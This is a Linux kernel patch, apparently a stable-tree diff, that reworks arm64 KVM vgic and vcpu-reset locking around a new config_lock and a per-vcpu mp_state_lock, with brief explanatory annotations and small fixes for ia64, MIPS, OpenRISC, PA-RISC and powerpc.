+-		mutex_unlock(&kvm->lock);
+ 		break;
+ 	default:
+ 		val = PSCI_RET_NOT_SUPPORTED;
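Across these PSCI hunks the serialization of power-state changes moves from the VM-wide kvm->lock to the new per-vcpu mp_state_lock, with lock-free readers paired via READ_ONCE()/WRITE_ONCE(). The resulting discipline, condensed from the changes above rather than added code:

    /* writer: state transitions take the per-vcpu spinlock */
    spin_lock(&vcpu->arch.mp_state_lock);
    WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
    spin_unlock(&vcpu->arch.mp_state_lock);

    /* reader: queries may run locklessly but must pair with READ_ONCE() */
    stopped = READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_STOPPED;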
+diff --git a/arch/arm64/kvm/reset.c b/arch/arm64/kvm/reset.c
+index 5ae18472205a9..f9d070473614e 100644
+--- a/arch/arm64/kvm/reset.c
++++ b/arch/arm64/kvm/reset.c
+@@ -200,7 +200,7 @@ static int kvm_set_vm_width(struct kvm_vcpu *vcpu)
+ 
+ 	is32bit = vcpu_has_feature(vcpu, KVM_ARM_VCPU_EL1_32BIT);
+ 
+-	lockdep_assert_held(&kvm->lock);
++	lockdep_assert_held(&kvm->arch.config_lock);
+ 
+ 	if (test_bit(KVM_ARCH_FLAG_REG_WIDTH_CONFIGURED, &kvm->arch.flags)) {
+ 		/*
+@@ -253,17 +253,18 @@ int kvm_reset_vcpu(struct kvm_vcpu *vcpu)
+ 	bool loaded;
+ 	u32 pstate;
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	ret = kvm_set_vm_width(vcpu);
+-	if (!ret) {
+-		reset_state = vcpu->arch.reset_state;
+-		WRITE_ONCE(vcpu->arch.reset_state.reset, false);
+-	}
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 
+ 	if (ret)
+ 		return ret;
+ 
++	spin_lock(&vcpu->arch.mp_state_lock);
++	reset_state = vcpu->arch.reset_state;
++	vcpu->arch.reset_state.reset = false;
++	spin_unlock(&vcpu->arch.mp_state_lock);
++
+ 	/* Reset PMU outside of the non-preemptible section */
+ 	kvm_pmu_vcpu_reset(vcpu);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-debug.c b/arch/arm64/kvm/vgic/vgic-debug.c
+index 78cde687383ca..07aa0437125a6 100644
+--- a/arch/arm64/kvm/vgic/vgic-debug.c
++++ b/arch/arm64/kvm/vgic/vgic-debug.c
+@@ -85,7 +85,7 @@ static void *vgic_debug_start(struct seq_file *s, loff_t *pos)
+ 	struct kvm *kvm = s->private;
+ 	struct vgic_state_iter *iter;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	iter = kvm->arch.vgic.iter;
+ 	if (iter) {
+ 		iter = ERR_PTR(-EBUSY);
+@@ -104,7 +104,7 @@ static void *vgic_debug_start(struct seq_file *s, loff_t *pos)
+ 	if (end_of_vgic(iter))
+ 		iter = NULL;
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return iter;
+ }
+ 
+@@ -132,12 +132,12 @@ static void vgic_debug_stop(struct seq_file *s, void *v)
+ 	if (IS_ERR(v))
+ 		return;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	iter = kvm->arch.vgic.iter;
+ 	kfree(iter->lpi_array);
+ 	kfree(iter);
+ 	kvm->arch.vgic.iter = NULL;
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ }
+ 
+ static void print_dist_state(struct seq_file *s, struct vgic_dist *dist)
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index f6d4f4052555c..8c1d2d7128db6 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -74,9 +74,6 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 	unsigned long i;
+ 	int ret;
+ 
+-	if (irqchip_in_kernel(kvm))
+-		return -EEXIST;
+-
+ 	/*
+ 	 * This function is also called by the KVM_CREATE_IRQCHIP handler,
+ 	 * which had no chance yet to check the availability of the GICv2
+@@ -87,10 +84,20 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 		!kvm_vgic_global_state.can_emulate_gicv2)
+ 		return -ENODEV;
+ 
++	/* Must be held to avoid race with vCPU creation */
++	lockdep_assert_held(&kvm->lock);
++
+ 	ret = -EBUSY;
+ 	if (!lock_all_vcpus(kvm))
+ 		return ret;
+ 
++	mutex_lock(&kvm->arch.config_lock);
++
++	if (irqchip_in_kernel(kvm)) {
++		ret = -EEXIST;
++		goto out_unlock;
++	}
++
+ 	kvm_for_each_vcpu(i, vcpu, kvm) {
+ 		if (vcpu_has_run_once(vcpu))
+ 			goto out_unlock;
+@@ -118,6 +125,7 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 		INIT_LIST_HEAD(&kvm->arch.vgic.rd_regions);
+ 
+ out_unlock:
++	mutex_unlock(&kvm->arch.config_lock);
+ 	unlock_all_vcpus(kvm);
+ 	return ret;
+ }
+@@ -227,9 +235,9 @@ int kvm_vgic_vcpu_init(struct kvm_vcpu *vcpu)
+ 	 * KVM io device for the redistributor that belongs to this VCPU.
+ 	 */
+ 	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
+-		mutex_lock(&vcpu->kvm->lock);
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 		ret = vgic_register_redist_iodev(vcpu);
+-		mutex_unlock(&vcpu->kvm->lock);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 	}
+ 	return ret;
+ }
+@@ -250,7 +258,6 @@ static void kvm_vgic_vcpu_enable(struct kvm_vcpu *vcpu)
+  * The function is generally called when nr_spis has been explicitly set
+  * by the guest through the KVM DEVICE API. If not nr_spis is set to 256.
+  * vgic_initialized() returns true when this function has succeeded.
+- * Must be called with kvm->lock held!
+  */
+ int vgic_init(struct kvm *kvm)
+ {
+@@ -259,6 +266,8 @@ int vgic_init(struct kvm *kvm)
+ 	int ret = 0, i;
+ 	unsigned long idx;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (vgic_initialized(kvm))
+ 		return 0;
+ 
+@@ -373,12 +382,13 @@ void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
+ 	vgic_cpu->rd_iodev.base_addr = VGIC_ADDR_UNDEF;
+ }
+ 
+-/* To be called with kvm->lock held */
+ static void __kvm_vgic_destroy(struct kvm *kvm)
+ {
+ 	struct kvm_vcpu *vcpu;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	vgic_debug_destroy(kvm);
+ 
+ 	kvm_for_each_vcpu(i, vcpu, kvm)
+@@ -389,9 +399,9 @@ static void __kvm_vgic_destroy(struct kvm *kvm)
+ 
+ void kvm_vgic_destroy(struct kvm *kvm)
+ {
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	__kvm_vgic_destroy(kvm);
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ }
+ 
+ /**
+@@ -414,9 +424,9 @@ int vgic_lazy_init(struct kvm *kvm)
+ 		if (kvm->arch.vgic.vgic_model != KVM_DEV_TYPE_ARM_VGIC_V2)
+ 			return -EBUSY;
+ 
+-		mutex_lock(&kvm->lock);
++		mutex_lock(&kvm->arch.config_lock);
+ 		ret = vgic_init(kvm);
+-		mutex_unlock(&kvm->lock);
++		mutex_unlock(&kvm->arch.config_lock);
+ 	}
+ 
+ 	return ret;
+@@ -441,7 +451,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	if (likely(vgic_ready(kvm)))
+ 		return 0;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	if (vgic_ready(kvm))
+ 		goto out;
+ 
+@@ -459,7 +469,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 		dist->ready = true;
+ 
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index 733b53055f976..c9a03033d5077 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -1958,6 +1958,16 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 	mutex_init(&its->its_lock);
+ 	mutex_init(&its->cmd_lock);
+ 
++	/* Yep, even more trickery for lock ordering... */
++#ifdef CONFIG_LOCKDEP
++	mutex_lock(&dev->kvm->arch.config_lock);
++	mutex_lock(&its->cmd_lock);
++	mutex_lock(&its->its_lock);
++	mutex_unlock(&its->its_lock);
++	mutex_unlock(&its->cmd_lock);
++	mutex_unlock(&dev->kvm->arch.config_lock);
++#endif
++
+ 	its->vgic_its_base = VGIC_ADDR_UNDEF;
+ 
+ 	INIT_LIST_HEAD(&its->device_list);
+@@ -2045,6 +2055,13 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
++	}
++
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	if (IS_VGIC_ADDR_UNDEF(its->vgic_its_base)) {
+ 		ret = -ENXIO;
+ 		goto out;
+@@ -2058,11 +2075,6 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 		goto out;
+ 	}
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
+-		ret = -EBUSY;
+-		goto out;
+-	}
+-
+ 	addr = its->vgic_its_base + offset;
+ 
+ 	len = region->access_flags & VGIC_ACCESS_64bit ? 8 : 4;
+@@ -2076,8 +2088,9 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 	} else {
+ 		*reg = region->its_read(dev->kvm, its, addr, len);
+ 	}
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 	return ret;
+ }
+@@ -2749,14 +2762,15 @@ static int vgic_its_ctrl(struct kvm *kvm, struct vgic_its *its, u64 attr)
+ 		return 0;
+ 
+ 	mutex_lock(&kvm->lock);
+-	mutex_lock(&its->its_lock);
+ 
+ 	if (!lock_all_vcpus(kvm)) {
+-		mutex_unlock(&its->its_lock);
+ 		mutex_unlock(&kvm->lock);
+ 		return -EBUSY;
+ 	}
+ 
++	mutex_lock(&kvm->arch.config_lock);
++	mutex_lock(&its->its_lock);
++
+ 	switch (attr) {
+ 	case KVM_DEV_ARM_ITS_CTRL_RESET:
+ 		vgic_its_reset(kvm, its);
+@@ -2769,8 +2783,9 @@ static int vgic_its_ctrl(struct kvm *kvm, struct vgic_its *its, u64 attr)
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(kvm);
+ 	mutex_unlock(&its->its_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++	unlock_all_vcpus(kvm);
+ 	mutex_unlock(&kvm->lock);
+ 	return ret;
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-kvm-device.c b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+index edeac2380591f..07e727023deb7 100644
+--- a/arch/arm64/kvm/vgic/vgic-kvm-device.c
++++ b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+@@ -46,7 +46,7 @@ int kvm_set_legacy_vgic_v2_addr(struct kvm *kvm, struct kvm_arm_device_addr *dev
+ 	struct vgic_dist *vgic = &kvm->arch.vgic;
+ 	int r;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	switch (FIELD_GET(KVM_ARM_DEVICE_TYPE_MASK, dev_addr->id)) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -68,7 +68,7 @@ int kvm_set_legacy_vgic_v2_addr(struct kvm *kvm, struct kvm_arm_device_addr *dev
+ 		r = -ENODEV;
+ 	}
+ 
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	return r;
+ }
+@@ -102,7 +102,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 		if (get_user(addr, uaddr))
+ 			return -EFAULT;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	switch (attr->attr) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -191,7 +191,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 	}
+ 
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	if (!r && !write)
+ 		r =  put_user(addr, uaddr);
+@@ -227,7 +227,7 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 		    (val & 31))
+ 			return -EINVAL;
+ 
+-		mutex_lock(&dev->kvm->lock);
++		mutex_lock(&dev->kvm->arch.config_lock);
+ 
+ 		if (vgic_ready(dev->kvm) || dev->kvm->arch.vgic.nr_spis)
+ 			ret = -EBUSY;
+@@ -235,16 +235,16 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 			dev->kvm->arch.vgic.nr_spis =
+ 				val - VGIC_NR_PRIVATE_IRQS;
+ 
+-		mutex_unlock(&dev->kvm->lock);
++		mutex_unlock(&dev->kvm->arch.config_lock);
+ 
+ 		return ret;
+ 	}
+ 	case KVM_DEV_ARM_VGIC_GRP_CTRL: {
+ 		switch (attr->attr) {
+ 		case KVM_DEV_ARM_VGIC_CTRL_INIT:
+-			mutex_lock(&dev->kvm->lock);
++			mutex_lock(&dev->kvm->arch.config_lock);
+ 			r = vgic_init(dev->kvm);
+-			mutex_unlock(&dev->kvm->lock);
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			return r;
+ 		case KVM_DEV_ARM_VGIC_SAVE_PENDING_TABLES:
+ 			/*
+@@ -260,7 +260,10 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 				mutex_unlock(&dev->kvm->lock);
+ 				return -EBUSY;
+ 			}
++
++			mutex_lock(&dev->kvm->arch.config_lock);
+ 			r = vgic_v3_save_pending_tables(dev->kvm);
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			unlock_all_vcpus(dev->kvm);
+ 			mutex_unlock(&dev->kvm->lock);
+ 			return r;
+@@ -411,15 +414,17 @@ static int vgic_v2_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
++	}
++
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	ret = vgic_init(dev->kvm);
+ 	if (ret)
+ 		goto out;
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
+-		ret = -EBUSY;
+-		goto out;
+-	}
+-
+ 	switch (attr->group) {
+ 	case KVM_DEV_ARM_VGIC_GRP_CPU_REGS:
+ 		ret = vgic_v2_cpuif_uaccess(vcpu, is_write, addr, &val);
+@@ -432,8 +437,9 @@ static int vgic_v2_attr_regs_access(struct kvm_device *dev,
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 
+ 	if (!ret && !is_write)
+@@ -569,12 +575,14 @@ static int vgic_v3_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
+-	if (unlikely(!vgic_initialized(dev->kvm))) {
+-		ret = -EBUSY;
+-		goto out;
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
+ 	}
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
++	mutex_lock(&dev->kvm->arch.config_lock);
++
++	if (unlikely(!vgic_initialized(dev->kvm))) {
+ 		ret = -EBUSY;
+ 		goto out;
+ 	}
+@@ -609,8 +617,9 @@ static int vgic_v3_attr_regs_access(struct kvm_device *dev,
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 
+ 	if (!ret && uaccess && !is_write) {
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 91201f7430339..472b18ac92a24 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -111,7 +111,7 @@ static void vgic_mmio_write_v3_misc(struct kvm_vcpu *vcpu,
+ 	case GICD_CTLR: {
+ 		bool was_enabled, is_hwsgi;
+ 
+-		mutex_lock(&vcpu->kvm->lock);
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 
+ 		was_enabled = dist->enabled;
+ 		is_hwsgi = dist->nassgireq;
+@@ -139,7 +139,7 @@ static void vgic_mmio_write_v3_misc(struct kvm_vcpu *vcpu,
+ 		else if (!was_enabled && dist->enabled)
+ 			vgic_kick_vcpus(vcpu->kvm);
+ 
+-		mutex_unlock(&vcpu->kvm->lock);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 		break;
+ 	}
+ 	case GICD_TYPER:
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio.c b/arch/arm64/kvm/vgic/vgic-mmio.c
+index b32d434c1d4a4..a95f99b93dd68 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio.c
+@@ -527,13 +527,13 @@ unsigned long vgic_mmio_read_active(struct kvm_vcpu *vcpu,
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 	u32 val;
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	val = __vgic_mmio_read_active(vcpu, addr, len);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 
+ 	return val;
+ }
+@@ -622,13 +622,13 @@ void vgic_mmio_write_cactive(struct kvm_vcpu *vcpu,
+ {
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	__vgic_mmio_write_cactive(vcpu, addr, len, val);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ }
+ 
+ int vgic_mmio_uaccess_write_cactive(struct kvm_vcpu *vcpu,
+@@ -659,13 +659,13 @@ void vgic_mmio_write_sactive(struct kvm_vcpu *vcpu,
+ {
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	__vgic_mmio_write_sactive(vcpu, addr, len, val);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ }
+ 
+ int vgic_mmio_uaccess_write_sactive(struct kvm_vcpu *vcpu,
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index a413718be92b8..3bb0034780605 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -232,9 +232,8 @@ int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq)
+  * @kvm:	Pointer to the VM being initialized
+  *
+  * We may be called each time a vITS is created, or when the
+- * vgic is initialized. This relies on kvm->lock to be
+- * held. In both cases, the number of vcpus should now be
+- * fixed.
++ * vgic is initialized. In both cases, the number of vcpus
++ * should now be fixed.
+  */
+ int vgic_v4_init(struct kvm *kvm)
+ {
+@@ -243,6 +242,8 @@ int vgic_v4_init(struct kvm *kvm)
+ 	int nr_vcpus, ret;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!kvm_vgic_global_state.has_gicv4)
+ 		return 0; /* Nothing to see here... move along. */
+ 
+@@ -309,14 +310,14 @@ int vgic_v4_init(struct kvm *kvm)
+ /**
+  * vgic_v4_teardown - Free the GICv4 data structures
+  * @kvm:	Pointer to the VM being destroyed
+- *
+- * Relies on kvm->lock to be held.
+  */
+ void vgic_v4_teardown(struct kvm *kvm)
+ {
+ 	struct its_vm *its_vm = &kvm->arch.vgic.its_vm;
+ 	int i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!its_vm->vpes)
+ 		return;
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic.c b/arch/arm64/kvm/vgic/vgic.c
+index d97e6080b4217..0a005da83ae64 100644
+--- a/arch/arm64/kvm/vgic/vgic.c
++++ b/arch/arm64/kvm/vgic/vgic.c
+@@ -24,11 +24,13 @@ struct vgic_global kvm_vgic_global_state __ro_after_init = {
+ /*
+  * Locking order is always:
+  * kvm->lock (mutex)
+- *   its->cmd_lock (mutex)
+- *     its->its_lock (mutex)
+- *       vgic_cpu->ap_list_lock		must be taken with IRQs disabled
+- *         kvm->lpi_list_lock		must be taken with IRQs disabled
+- *           vgic_irq->irq_lock		must be taken with IRQs disabled
++ *   vcpu->mutex (mutex)
++ *     kvm->arch.config_lock (mutex)
++ *       its->cmd_lock (mutex)
++ *         its->its_lock (mutex)
++ *           vgic_cpu->ap_list_lock		must be taken with IRQs disabled
++ *             kvm->lpi_list_lock		must be taken with IRQs disabled
++ *               vgic_irq->irq_lock		must be taken with IRQs disabled
+  *
+  * As the ap_list_lock might be taken from the timer interrupt handler,
+  * we have to disable IRQs before taking this lock and everything lower
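This comment is the authoritative statement of the new hierarchy, and the device-ioctl hunks elsewhere in this patch all follow the same shape. Condensed into one sequence (a sketch assembled from the vgic-kvm-device.c changes above, not additional code):

    mutex_lock(&dev->kvm->lock);
    if (!lock_all_vcpus(dev->kvm)) {
            mutex_unlock(&dev->kvm->lock);
            return -EBUSY;
    }
    mutex_lock(&dev->kvm->arch.config_lock);
    /* ... touch vgic configuration ... */
    mutex_unlock(&dev->kvm->arch.config_lock);
    unlock_all_vcpus(dev->kvm);
    mutex_unlock(&dev->kvm->lock);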
+diff --git a/arch/ia64/kernel/salinfo.c b/arch/ia64/kernel/salinfo.c
+index bd3ba276e69c3..03b632c568995 100644
+--- a/arch/ia64/kernel/salinfo.c
++++ b/arch/ia64/kernel/salinfo.c
+@@ -581,7 +581,7 @@ static int salinfo_cpu_pre_down(unsigned int cpu)
+  * 'data' contains an integer that corresponds to the feature we're
+  * testing
+  */
+-static int proc_salinfo_show(struct seq_file *m, void *v)
++static int __maybe_unused proc_salinfo_show(struct seq_file *m, void *v)
+ {
+ 	unsigned long data = (unsigned long)v;
+ 	seq_puts(m, (sal_platform_features & data) ? "1\n" : "0\n");
+diff --git a/arch/ia64/mm/contig.c b/arch/ia64/mm/contig.c
+index 24901d8093015..1e9eaa107eb73 100644
+--- a/arch/ia64/mm/contig.c
++++ b/arch/ia64/mm/contig.c
+@@ -77,7 +77,7 @@ skip:
+ 	return __per_cpu_start + __per_cpu_offset[smp_processor_id()];
+ }
+ 
+-static inline void
++static inline __init void
+ alloc_per_cpu_data(void)
+ {
+ 	size_t size = PERCPU_PAGE_SIZE * num_possible_cpus();
+diff --git a/arch/ia64/mm/hugetlbpage.c b/arch/ia64/mm/hugetlbpage.c
+index f993cb36c0626..921db957d2e67 100644
+--- a/arch/ia64/mm/hugetlbpage.c
++++ b/arch/ia64/mm/hugetlbpage.c
+@@ -58,7 +58,7 @@ huge_pte_offset (struct mm_struct *mm, unsigned long addr, unsigned long sz)
+ 
+ 	pgd = pgd_offset(mm, taddr);
+ 	if (pgd_present(*pgd)) {
+-		p4d = p4d_offset(pgd, addr);
++		p4d = p4d_offset(pgd, taddr);
+ 		if (p4d_present(*p4d)) {
+ 			pud = pud_offset(p4d, taddr);
+ 			if (pud_present(*pud)) {
+diff --git a/arch/mips/fw/lib/cmdline.c b/arch/mips/fw/lib/cmdline.c
+index f24cbb4a39b50..892765b742bbc 100644
+--- a/arch/mips/fw/lib/cmdline.c
++++ b/arch/mips/fw/lib/cmdline.c
+@@ -53,7 +53,7 @@ char *fw_getenv(char *envname)
+ {
+ 	char *result = NULL;
+ 
+-	if (_fw_envp != NULL) {
++	if (_fw_envp != NULL && fw_envp(0) != NULL) {
+ 		/*
+ 		 * Return a pointer to the given environment variable.
+ 		 * YAMON uses "name", "value" pairs, while U-Boot uses
+diff --git a/arch/openrisc/kernel/entry.S b/arch/openrisc/kernel/entry.S
+index 54a87bba35caa..a130c4dac48d3 100644
+--- a/arch/openrisc/kernel/entry.S
++++ b/arch/openrisc/kernel/entry.S
+@@ -173,7 +173,6 @@ handler:							;\
+ 	l.sw    PT_GPR28(r1),r28					;\
+ 	l.sw    PT_GPR29(r1),r29					;\
+ 	/* r30 already save */					;\
+-/*        l.sw    PT_GPR30(r1),r30*/					;\
+ 	l.sw    PT_GPR31(r1),r31					;\
+ 	TRACE_IRQS_OFF_ENTRY						;\
+ 	/* Store -1 in orig_gpr11 for non-syscall exceptions */	;\
+@@ -211,9 +210,8 @@ handler:							;\
+ 	l.sw    PT_GPR27(r1),r27					;\
+ 	l.sw    PT_GPR28(r1),r28					;\
+ 	l.sw    PT_GPR29(r1),r29					;\
+-	/* r31 already saved */					;\
+-	l.sw    PT_GPR30(r1),r30					;\
+-/*        l.sw    PT_GPR31(r1),r31	*/				;\
++	/* r30 already saved */						;\
++	l.sw    PT_GPR31(r1),r31					;\
+ 	/* Store -1 in orig_gpr11 for non-syscall exceptions */	;\
+ 	l.addi	r30,r0,-1					;\
+ 	l.sw	PT_ORIG_GPR11(r1),r30				;\
+diff --git a/arch/parisc/kernel/pacache.S b/arch/parisc/kernel/pacache.S
+index 9a0018f1f42cb..541370d145594 100644
+--- a/arch/parisc/kernel/pacache.S
++++ b/arch/parisc/kernel/pacache.S
+@@ -889,6 +889,7 @@ ENDPROC_CFI(flush_icache_page_asm)
+ ENTRY_CFI(flush_kernel_dcache_page_asm)
+ 88:	ldil		L%dcache_stride, %r1
+ 	ldw		R%dcache_stride(%r1), %r23
++	depi_safe	0, 31,PAGE_SHIFT, %r26	/* Clear any offset bits */
+ 
+ #ifdef CONFIG_64BIT
+ 	depdi,z		1, 63-PAGE_SHIFT,1, %r25
+@@ -925,6 +926,7 @@ ENDPROC_CFI(flush_kernel_dcache_page_asm)
+ ENTRY_CFI(purge_kernel_dcache_page_asm)
+ 88:	ldil		L%dcache_stride, %r1
+ 	ldw		R%dcache_stride(%r1), %r23
++	depi_safe	0, 31,PAGE_SHIFT, %r26	/* Clear any offset bits */
+ 
+ #ifdef CONFIG_64BIT
+ 	depdi,z		1, 63-PAGE_SHIFT,1, %r25
+diff --git a/arch/parisc/kernel/real2.S b/arch/parisc/kernel/real2.S
+index 2b16d8d6598f1..c37010a135865 100644
+--- a/arch/parisc/kernel/real2.S
++++ b/arch/parisc/kernel/real2.S
+@@ -248,9 +248,6 @@ ENTRY_CFI(real64_call_asm)
+ 	/* save fn */
+ 	copy	%arg2, %r31
+ 
+-	/* set up the new ap */
+-	ldo	64(%arg1), %r29
+-
+ 	/* load up the arg registers from the saved arg area */
+ 	/* 32-bit calling convention passes first 4 args in registers */
+ 	ldd	0*REG_SZ(%arg1), %arg0		/* note overwriting arg0 */
+@@ -262,7 +259,9 @@ ENTRY_CFI(real64_call_asm)
+ 	ldd	7*REG_SZ(%arg1), %r19
+ 	ldd	1*REG_SZ(%arg1), %arg1		/* do this one last! */
+ 
++	/* set up real-mode stack and real-mode ap */
+ 	tophys_r1 %sp
++	ldo	-16(%sp), %r29			/* Reference param save area */
+ 
+ 	b,l	rfi_virt2real,%r2
+ 	nop
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index 295f76df13b55..13fad4f0a6d8f 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -34,6 +34,8 @@ endif
+ 
+ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 -fno-strict-aliasing -O2 -msoft-float -mno-altivec -mno-vsx \
++		 $(call cc-option,-mno-prefixed) $(call cc-option,-mno-pcrel) \
++		 $(call cc-option,-mno-mma) \
+ 		 $(call cc-option,-mno-spe) $(call cc-option,-mspe=no) \
+ 		 -pipe -fomit-frame-pointer -fno-builtin -fPIC -nostdinc \
